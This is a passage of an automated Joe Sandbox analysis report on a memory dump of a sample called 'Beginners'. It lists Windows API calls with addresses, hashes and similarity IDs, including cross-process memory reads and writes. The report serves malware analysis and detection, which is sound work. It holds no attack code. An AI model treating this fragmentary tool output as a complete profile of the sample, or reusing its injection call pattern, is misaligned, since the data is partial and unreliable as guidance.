                                          • API ID: MessagePostSleep$RectWindow
                                          • String ID:
                                          • API String ID: 3382505437-0
                                          • Opcode ID: 4dfc38015b94dd4436f7e4b22de8602093732f25fbbab52560e0281315c53608
                                          • Instruction ID: 4ea0be54a937333d4c06b4fe50ba963f8428bc17f772af433a2e5313da731acf
                                          • Opcode Fuzzy Hash: 4dfc38015b94dd4436f7e4b22de8602093732f25fbbab52560e0281315c53608
                                          • Instruction Fuzzy Hash: 0F31EC71900219EFDB14CFA8D94CAEE3BB5FB49315F104228F965AB2E1C3B19960CB90
                                          APIs
                                            • Part of subcall function 000B29E2: GetWindowLongW.USER32(?,000000EB), ref: 000B29F3
                                          • GetWindowLongW.USER32(?,000000F0), ref: 0013B804
                                          • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 0013B829
                                          • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 0013B841
                                          • GetSystemMetrics.USER32(00000004), ref: 0013B86A
                                          • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,0012155C,00000000), ref: 0013B888
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                           • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: Window$Long$MetricsSystem
                                          • String ID:
                                          • API String ID: 2294984445-0
                                          APIs
                                          • IsWindow.USER32(00000000), ref: 00126159
                                          • GetForegroundWindow.USER32 ref: 00126170
                                          • GetDC.USER32(00000000), ref: 001261AC
                                          • GetPixel.GDI32(00000000,?,00000003), ref: 001261B8
                                          • ReleaseDC.USER32(00000000,00000003), ref: 001261F3
                                          Similarity
                                          • API ID: Window$ForegroundPixelRelease
                                          • String ID:
                                          • API String ID: 4156661090-0
                                          APIs
                                          • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 000B1729
                                          • SelectObject.GDI32(?,00000000), ref: 000B1738
                                          • BeginPath.GDI32(?), ref: 000B174F
                                          • SelectObject.GDI32(?,00000000), ref: 000B1778
                                          Similarity
                                          • API ID: ObjectSelect$BeginCreatePath
                                          • String ID:
                                          • API String ID: 3225163088-0
                                          APIs
                                          Similarity
                                          • API ID: _memcmp
                                          • String ID:
                                          • API String ID: 2931989736-0
                                          APIs
                                          • GetCurrentThreadId.KERNEL32 ref: 00115075
                                          • __beginthreadex.LIBCMT ref: 00115093
                                          • MessageBoxW.USER32(?,?,?,?), ref: 001150A8
                                          • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 001150BE
                                          • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 001150C5
                                          Similarity
                                          • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                                          • String ID:
                                          • API String ID: 3824534824-0
                                          APIs
                                          • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00108E3C
                                          • GetLastError.KERNEL32(?,00108900,?,?,?), ref: 00108E46
                                          • GetProcessHeap.KERNEL32(00000008,?,?,00108900,?,?,?), ref: 00108E55
                                          • HeapAlloc.KERNEL32(00000000,?,00108900,?,?,?), ref: 00108E5C
                                          • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00108E73
                                          Similarity
                                          • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                          • String ID:
                                          • API String ID: 842720411-0
                                          APIs
                                          • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 0011581B
                                          • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00115829
                                          • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00115831
                                          • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 0011583B
                                          • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00115877
                                          Similarity
                                          • API ID: PerformanceQuery$CounterSleep$Frequency
                                          • String ID:
                                          • API String ID: 2833360925-0
                                          APIs
                                          • CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00107C62,80070057,?,?,?,00108073), ref: 00107D45
                                          • ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00107C62,80070057,?,?), ref: 00107D60
                                          • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00107C62,80070057,?,?), ref: 00107D6E
                                          • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00107C62,80070057,?), ref: 00107D7E
                                          • CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00107C62,80070057,?,?), ref: 00107D8A
                                          Similarity
                                          • API ID: From$Prog$FreeStringTasklstrcmpi
                                          • String ID:
                                          • API String ID: 3897988419-0
                                          APIs
                                          • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00108CDE
                                          • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00108CE8
                                          • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00108CF7
                                          • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00108CFE
                                          • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00108D14
                                          Similarity
                                          • API ID: HeapInformationToken$AllocErrorLastProcess
                                          • String ID:
                                          • API String ID: 44706859-0
                                          APIs
                                          • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00108D3F
                                          • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00108D49
                                          • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00108D58
                                          • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00108D5F
                                          • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00108D75
                                          Similarity
                                          • API ID: HeapInformationToken$AllocErrorLastProcess
                                          • String ID:
                                          • API String ID: 44706859-0
                                          APIs
                                          • GetDlgItem.USER32(?,000003E9), ref: 0010CD90
                                          • GetWindowTextW.USER32(00000000,?,00000100), ref: 0010CDA7
                                          • MessageBeep.USER32(00000000), ref: 0010CDBF
                                          • KillTimer.USER32(?,0000040A), ref: 0010CDDB
                                          • EndDialog.USER32(?,00000001), ref: 0010CDF5
                                          Similarity
                                          • API ID: BeepDialogItemKillMessageTextTimerWindow
                                          • String ID:
                                          • API String ID: 3741023627-0
                                          APIs
                                          • EndPath.GDI32(?), ref: 000B179B
                                          • StrokeAndFillPath.GDI32(?,?,000EBBC9,00000000,?), ref: 000B17B7
                                          • SelectObject.GDI32(?,00000000), ref: 000B17CA
                                          • DeleteObject.GDI32 ref: 000B17DD
                                          • StrokePath.GDI32(?), ref: 000B17F8
                                          Similarity
                                          • API ID: Path$ObjectStroke$DeleteFillSelect
                                          • String ID:
                                          • API String ID: 2625713937-0
                                          APIs
                                          • CoInitialize.OLE32(00000000), ref: 0011CA75
                                          • CoCreateInstance.OLE32(00143D3C,00000000,00000001,00143BAC,?), ref: 0011CA8D
                                            • Part of subcall function 000C1A36: _memmove.LIBCMT ref: 000C1A77
                                          • CoUninitialize.OLE32 ref: 0011CCFA
                                          Strings
                                          Similarity
                                          • API ID: CreateInitializeInstanceUninitialize_memmove
                                          • String ID: .lnk
                                          • API String ID: 2683427295-24824748
                                          APIs
                                            • Part of subcall function 000D0FE6: std::exception::exception.LIBCMT ref: 000D101C
                                            • Part of subcall function 000D0FE6: __CxxThrowException@8.LIBCMT ref: 000D1031
                                            • Part of subcall function 000C1A36: _memmove.LIBCMT ref: 000C1A77
                                            • Part of subcall function 000C1680: _memmove.LIBCMT ref: 000C16DB
                                          • __swprintf.LIBCMT ref: 000BE598
                                          Strings
                                          • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 000BE431
                                          Similarity
                                          • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                          • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                          • API String ID: 1943609520-557222456
                                          • Opcode ID: 73ea994744df00a8da35e6cc5303b565de8c4a71741b5713bb139e8f8945c11b
                                          • Instruction ID: e5da1d3fe6295c2104b5e24358a27880941bedcadd37e391779c76a927e5bb39
                                          • Opcode Fuzzy Hash: 73ea994744df00a8da35e6cc5303b565de8c4a71741b5713bb139e8f8945c11b
                                          • Instruction Fuzzy Hash: 56917B715087419FC724EF24D895DFEB7E8AF96300F40091DF596972A3EA20EE44CBA2
                                          APIs
                                          • __startOneArgErrorHandling.LIBCMT ref: 000D52CD
                                            • Part of subcall function 000E0320: __87except.LIBCMT ref: 000E035B
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: ErrorHandling__87except__start
                                          • String ID: pow
                                          • API String ID: 2905807303-2276729525
                                          • Opcode ID: 2e8a2936bf42fc243cde91a309e868f733ff310ecab9c73f155a9f5d2279ce1c
                                          • Instruction ID: 3004928064f4da41ec3aabe9e93f7f54caab7121ac56461bec048c1e2afadd61
                                          • Opcode Fuzzy Hash: 2e8a2936bf42fc243cde91a309e868f733ff310ecab9c73f155a9f5d2279ce1c
                                          • Instruction Fuzzy Hash: F151C0F1A097418BCB517729CE413BE37E49B01752F304D1AF8C5553EAEEB48DC89A62
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: #$+
                                          • API String ID: 0-2552117581
                                          • Opcode ID: c1c6e2702242df368eb5c742f0913bfc26d2fffbce1f705520defcd0a9739ccb
                                          • Instruction ID: 886ccc3751e82f8097957eae5739d4e28d32c26102f45f78cc5206d783321f79
                                          • Opcode Fuzzy Hash: c1c6e2702242df368eb5c742f0913bfc26d2fffbce1f705520defcd0a9739ccb
                                          • Instruction Fuzzy Hash: 23511175904346CFDB25DF28C884AFE7BA4EF5A310F148056F8959B2D1C770ACA2CB60
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: _memset$_memmove
                                          • String ID: ERCP
                                          • API String ID: 2532777613-1384759551
                                          • Opcode ID: 5317d235618fbde352462c94f0ce635d4057feb54f16d7930aff087c699705bf
                                          • Instruction ID: 2df0d83b3483163b2948fa1d811986224fe89b5d1aba69f1623f715178e10a84
                                          • Opcode Fuzzy Hash: 5317d235618fbde352462c94f0ce635d4057feb54f16d7930aff087c699705bf
                                          • Instruction Fuzzy Hash: F451A2719007099BDB24CF68C881BEEBBE4EF04314F24857FE48ADB291E775A585CB80
                                          APIs
                                            • Part of subcall function 00111CBB: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00109E4E,?,?,00000034,00000800,?,00000034), ref: 00111CE5
                                          • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 0010A3F7
                                            • Part of subcall function 00111C86: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00109E7D,?,?,00000800,?,00001073,00000000,?,?), ref: 00111CB0
                                            • Part of subcall function 00111BDD: GetWindowThreadProcessId.USER32(?,?), ref: 00111C08
                                            • Part of subcall function 00111BDD: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00109E12,00000034,?,?,00001004,00000000,00000000), ref: 00111C18
                                            • Part of subcall function 00111BDD: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00109E12,00000034,?,?,00001004,00000000,00000000), ref: 00111C2E
                                          • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0010A464
                                          • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0010A4B1
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                          • String ID: @
                                          • API String ID: 4150878124-2766056989
                                          • Opcode ID: 17077f2a45a42c5392e563089a2ea9c1e2f25f144c66982bc849fa8a502758ae
                                          • Instruction ID: 89e3a1942e4e5a10b94a635ef5e7000dcf870a8b68b87f44b04a4fb745a43d00
                                          • Opcode Fuzzy Hash: 17077f2a45a42c5392e563089a2ea9c1e2f25f144c66982bc849fa8a502758ae
                                          • Instruction Fuzzy Hash: 10414B7690121CBFCB14DBA4CC85BDEB7B8EF49300F0440A5FA45A7180DBB06E85CBA1
                                          APIs
                                          • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00137A86
                                          • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00137A9A
                                          • SendMessageW.USER32(?,00001002,00000000,?), ref: 00137ABE
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: MessageSend$Window
                                          • String ID: SysMonthCal32
                                          • API String ID: 2326795674-1439706946
                                          • Opcode ID: 6ed8df8f7e7cb5e2c59cbc1bace8d970ff02d804666620e55b54105b0843d49e
                                          • Instruction ID: 8493e7db2d8cea0368b79c7fdac4ee95d941aeb4166f5a925bb30dde8a5d06fe
                                          • Opcode Fuzzy Hash: 6ed8df8f7e7cb5e2c59cbc1bace8d970ff02d804666620e55b54105b0843d49e
                                          • Instruction Fuzzy Hash: B0219172604218AFDF258F54CC86FEE3B69EF48724F150114FE156B1D0DB71A9919B90
                                          APIs
                                          • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 0013826F
                                          • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 0013827D
                                          • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00138284
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: MessageSend$DestroyWindow
                                          • String ID: msctls_updown32
                                          • API String ID: 4014797782-2298589950
                                          • Opcode ID: 53db7f8ddf6a63879c00a6a0de9f3f588b440901efbc193fe3eb915a7d568959
                                          • Instruction ID: 6356b60b09232866bf2d4fdd90c38a1e3f6c6214f49a48ded031e57fdb4eecc5
                                          • Opcode Fuzzy Hash: 53db7f8ddf6a63879c00a6a0de9f3f588b440901efbc193fe3eb915a7d568959
                                          • Instruction Fuzzy Hash: A1218EB5604209AFDB10DF58CCC5DA737EDEB5A3A4F080059FA059B2A1CB70EC51CBA0
                                          APIs
                                          • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00137360
                                          • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00137370
                                          • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00137395
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: MessageSend$MoveWindow
                                          • String ID: Listbox
                                          • API String ID: 3315199576-2633736733
                                          • Opcode ID: fcaea08da3f77a9487391192199c58a10d354683807431ea7a0f0496a58b128f
                                          • Instruction ID: bd81a6e112315464f240c7e0b0a4c332dada78972faefdaaeaad65faa93e6c50
                                          • Opcode Fuzzy Hash: fcaea08da3f77a9487391192199c58a10d354683807431ea7a0f0496a58b128f
                                          • Instruction Fuzzy Hash: 2C21BE72604118BFDF268F54CC85EBF3BAAEB89764F018124FA459B1E0C771AC519BA0
                                          APIs
                                          • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00137D97
                                          • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00137DAC
                                          • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00137DB9
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: MessageSend
                                          • String ID: msctls_trackbar32
                                          • API String ID: 3850602802-1010561917
                                          • Opcode ID: 732bcfde5864a9352aad6a921ea9d3221b51d29f025244a84dfd83b5aedf9db8
                                          • Instruction ID: 536288d900350e1b17be8b77c0c5477ee0c1094ae9674769cf3874b4f0e6f09e
                                          • Opcode Fuzzy Hash: 732bcfde5864a9352aad6a921ea9d3221b51d29f025244a84dfd83b5aedf9db8
                                          • Instruction Fuzzy Hash: A211E7B2244209BADF245FA4CC45FE737A9EF89754F114528FB45A60D0D7719851CB20
                                          APIs
                                          • LoadLibraryA.KERNEL32(kernel32.dll,?,000F027A,?), ref: 0012C6E7
                                          • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0012C6F9
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: AddressLibraryLoadProc
                                          • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                          • API String ID: 2574300362-1816364905
                                          • Opcode ID: 4c3020830cc7cc06f7ef6ff9fde7cb647cde8d1b084537c6f3f884b602cec825
                                          • Instruction ID: e019d709c88e63f5be7418d6a46d7a8a9ded1e024a326e3c530ed18e5c3bf3fe
                                          • Opcode Fuzzy Hash: 4c3020830cc7cc06f7ef6ff9fde7cb647cde8d1b084537c6f3f884b602cec825
                                          • Instruction Fuzzy Hash: A5E0C27C2103238FD7215B26DC48A5A76D4FF18B04B408429EA85D2620D774C8C0CF90
                                          APIs
                                          • LoadLibraryA.KERNEL32(kernel32.dll,?,000C4B44,?,000C49D4,?,?,000C27AF,?,00000001), ref: 000C4B85
                                          • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 000C4B97
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: AddressLibraryLoadProc
                                          • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                          • API String ID: 2574300362-3689287502
                                          • Opcode ID: 30fe51cbd59f48ad59e44d107cef107bf66d2fab81f79d01fc685a0b813b0fd3
                                          • Instruction ID: 2da751817b9cd9a68d73ba89cdc8e71afb4afc7093e4d70cba16d96321931142
                                          • Opcode Fuzzy Hash: 30fe51cbd59f48ad59e44d107cef107bf66d2fab81f79d01fc685a0b813b0fd3
                                          • Instruction Fuzzy Hash: 98D017B55207128FD7219F32DC28B0A76E4AF09755F11882ED596E2AA0E7B0E8C0DA10
                                          APIs
                                          • LoadLibraryA.KERNEL32(kernel32.dll,?,000C4AF7,?), ref: 000C4BB8
                                          • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 000C4BCA
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: AddressLibraryLoadProc
                                          • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                          • API String ID: 2574300362-1355242751
                                          • Opcode ID: e346050e3d2b17fcdbeaaf817ed79a51463f2e454df114789fba2b28c094bda4
                                          • Instruction ID: cfd5ef26df26cc9a9702125b34c5df70e4f3157cab87eab5527b61a6850b23ee
                                          • Opcode Fuzzy Hash: e346050e3d2b17fcdbeaaf817ed79a51463f2e454df114789fba2b28c094bda4
                                          • Instruction Fuzzy Hash: 4ED0C7B48203138FD3218F32DC08B0A72E4AF09740B008C6ED486C2AA8EBB0C8C0CA00
                                          APIs
                                          • LoadLibraryA.KERNEL32(advapi32.dll,?,00131696), ref: 00131455
                                          • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00131467
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: AddressLibraryLoadProc
                                          • String ID: RegDeleteKeyExW$advapi32.dll
                                          • API String ID: 2574300362-4033151799
                                          • Opcode ID: a4448e12548cf38011436ae9064508bf7e56a1caa938e62356314972bb94ee36
                                          • Instruction ID: 000bd205dc6ad4290b72fb1664be191f950a327a9802c5138348abd2a77d0ebf
                                          • Opcode Fuzzy Hash: a4448e12548cf38011436ae9064508bf7e56a1caa938e62356314972bb94ee36
                                          • Instruction Fuzzy Hash: 92D01774510713DFD7219F76CC0861676E4AF1B795F11C82E98E6D2560EB70D8C0CA50
                                          APIs
                                          • LoadLibraryA.KERNEL32(kernel32.dll,?,000C5E3D), ref: 000C55FE
                                          • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 000C5610
                                          Strings
                                          Memory Dump Source
